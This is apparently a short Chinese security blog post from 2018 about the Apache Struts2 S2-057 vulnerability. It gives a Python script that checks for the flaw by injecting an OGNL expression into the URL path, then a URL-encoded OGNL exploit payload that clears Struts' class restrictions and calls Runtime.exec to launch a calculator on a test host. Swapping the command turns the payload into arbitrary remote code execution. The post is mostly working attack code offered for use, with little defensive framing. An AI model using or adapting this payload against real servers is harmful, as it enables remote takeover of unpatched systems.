Struts2-057(验证POC+exp)

发布于 2018-08-24  1794 次阅读


st-057
验证POC下载

#coding=utf-8
import requests
import re
import sys

def check_vul(url):
    charType = sys.getfilesystemencoding()
    url_piece = url.split('/')
    url_piece[-2] = url_piece[-2]+"/"+ '${(111+111)}'
    test_url = ''
    for i in url_piece:
        if i == url_piece[-1]:
            test_url = test_url + i
        else:
            test_url = test_url + i + '/'
    try:
        res = requests.get(test_url)
    except:
        return None
    if '302' in str(res.history) and '222' in res.url:
        print('存在 Struts2-057漏洞!'.decode('UTF-8').encode(charType))


if __name__ == '__main__':
    url = sys.argv[1]
    check_vul(url)

攻击exp
弹计算器

http://192.168.44.1:8080/struts2-showcase/%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d/actionChain1.action

网络安全研究员、渗透测试攻城狮
文能社会工程学,武能过狗拿shell
日的了站,做的了饭。
人生格言:即使是咸鱼,也一定是最咸的那条